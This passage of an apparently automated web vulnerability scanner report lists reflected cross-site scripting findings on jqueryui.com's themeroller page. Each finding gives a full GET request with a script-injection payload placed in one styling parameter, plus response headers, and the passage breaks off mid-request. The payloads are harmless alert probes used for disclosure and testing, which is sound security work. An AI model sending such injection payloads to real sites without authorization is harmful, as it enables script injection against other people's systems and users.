GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100997f9"><script>alert(1)</script>4169bdc7a36&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f4cd"><script>alert(1)</script>021c587b46e was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=505f4cd"><script>alert(1)</script>021c587b46e&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55e29"><script>alert(1)</script>b8d95e5854a was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=10055e29"><script>alert(1)</script>b8d95e5854a&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d783"><script>alert(1)</script>2b423fbb9cc was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=209d783"><script>alert(1)</script>2b423fbb9cc&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf71a"><script>alert(1)</script>3021fc0395e was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20bf71a"><script>alert(1)</script>3021fc0395e&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5df9"><script>alert(1)</script>9a2ba1a34a3 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50e5df9"><script>alert(1)</script>9a2ba1a34a3&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 958d8"><script>alert(1)</script>dd7211d45b9 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0958d8"><script>alert(1)</script>dd7211d45b9&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6979a"><script>alert(1)</script>b2a5040142e was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=1006979a"><script>alert(1)</script>b2a5040142e&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7e1d"><script>alert(1)</script>60f896847d1 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.pngd7e1d"><script>alert(1)</script>60f896847d1&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 865b2"><script>alert(1)</script>175935ab28c was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png865b2"><script>alert(1)</script>175935ab28c&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 725fa"><script>alert(1)</script>a9631e9090e was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png725fa"><script>alert(1)</script>a9631e9090e&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db08e"><script>alert(1)</script>da74d127cad was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.pngdb08e"><script>alert(1)</script>da74d127cad&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d14ec"><script>alert(1)</script>5d04dd7c806 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.pngd14ec"><script>alert(1)</script>5d04dd7c806&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighl